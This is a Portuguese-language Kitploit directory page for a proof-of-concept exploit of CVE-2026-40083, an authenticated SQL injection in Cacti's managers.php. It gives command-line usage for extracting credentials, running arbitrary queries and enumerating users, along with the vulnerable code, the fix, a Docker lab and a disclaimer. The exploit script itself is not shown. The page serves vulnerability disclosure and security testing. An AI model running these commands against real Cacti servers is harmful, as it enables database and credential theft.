Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-40083 — Exploit de prova de conceito para CVE-2026-40083, uma injeção de SQL no Cacti managers.php permitindo que usuários autenticados extraiam bancos de dados MySQL, credenciais de usuário e hashes de senha. Inclui laboratório Docker para testes. | Kitploit
Ferramentas/GitHubGitHub/hakaioffsec/cve-2026-40083
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubhakaioffsec/cve-2026-40083

CVE-2026-40083

Exploit de prova de conceito para CVE-2026-40083, uma injeção de SQL no Cacti managers.php permitindo que usuários autenticados extraiam bancos de dados MySQL, credenciais de usuário e hashes de senha. Inclui laboratório Docker para testes.

Ver Repositório
22há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Injeção SQL no managers.php do Cacti

Um exploit de prova de conceito para CVE-2026-40083, uma vulnerabilidade de Injeção SQL no managers.php do Cacti que permite que qualquer usuário autenticado com permissões de Gerenciador SNMP leia todo o banco de dados MySQL, incluindo credenciais de usuário e hashes de senhas.

Uso:

root@kitploit:~
# Verificar injeção (baseada em tempo)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin

# Extrair credenciais de um usuário específico
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1

# Extrair resultado de consulta SQL arbitrária
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"

# Enumerar todos os usuários (varredura de IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50

# Com proxy Burp
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080

Versões Vulneráveis

  • Cacti ≤ 1.2.30 (corrigido na versão 1.2.31)

Causa Raiz

No managers.php, a entrada do usuário de selected_graphs_array é desserializada via cacti_unserialize() e inserida diretamente no SQL sem sanitização:

root@kitploit:~
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));

if ($selected_items != false) {
    // Sem validação - inserção direta no SQL
    db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}

O parâmetro selected_graphs_array aceita um array serializado em PHP. Os elementos do array são concatenados com vírgulas e injetados diretamente na cláusula IN.

Endpoints Afetados

POST /managers.php (action=actions, drp_action=1|2|3)

Impacto

A vulnerabilidade de Injeção SQL permite que usuários autenticados com permissões de Gerenciador SNMP executem consultas arbitrárias no banco de dados. Isso possibilita a leitura de tabelas contendo dados de usuários, configurações, credenciais de dispositivos e comunidades SNMP, bem como a extração de hashes bcrypt e tokens de API, o que pode resultar em comprometimento de contas. Além disso, a falha permite a execução de comandos com atraso de tempo, potencialmente causando negação de serviço ao esgotar conexões simultâneas com o banco de dados.

CVSS

7.2 Alto CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Correção

O commit 52032e760 adiciona array_map('intval', $selected_items) antes do implode para converter todos os valores em inteiros.

Configuração do Laboratório

root@kitploit:~
docker-compose up -d --build

Aguarde aproximadamente 30 segundos para a inicialização. Acesse o Cacti em http://localhost:8088

Credenciais padrão: admin / admin

root@kitploit:~
# Testar exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1

Aviso Legal

Esta ferramenta é apenas para fins educacionais e de pesquisa. Use-a apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano causado por este programa.

QuimeraX Intelligence

A QuimeraX Intelligence é uma plataforma avançada de EASM e Inteligência de Ameaças Cibernéticas especializada na identificação de vulnerabilidades críticas em sistemas complexos. A plataforma monitora, detecta e alerta proativamente os clientes sobre ameaças de segurança, garantindo transparência e resposta rápida a riscos potenciais. Os clientes recebem notificações imediatas e relatórios abrangentes se seus sistemas forem considerados vulneráveis, permitindo que tomem medidas de proteção. saiba mais

Hakai Security

Hakai Security é uma empresa de segurança cibernética fundada por profissionais de segurança, comprometida com a excelência técnica. Oferecemos soluções de segurança personalizadas, incluindo testes de penetração avançados, simulações realistas de Red Team e práticas de desenvolvimento seguro para proteger proativamente os ativos de nossos clientes contra ameaças cibernéticas em evolução.

Hacking Club

Hacking Club é a plataforma de treinamento onde você aprende segurança cibernética por meio de aulas práticas, laboratórios e desafios criados por especialistas que trabalham em nossa consultoria de segurança: diretamente do campo de batalha para o seu treinamento. Pratique a vulnerabilidade apresentada neste repositório pelo hacking club! saiba mais

Baixar ferramenta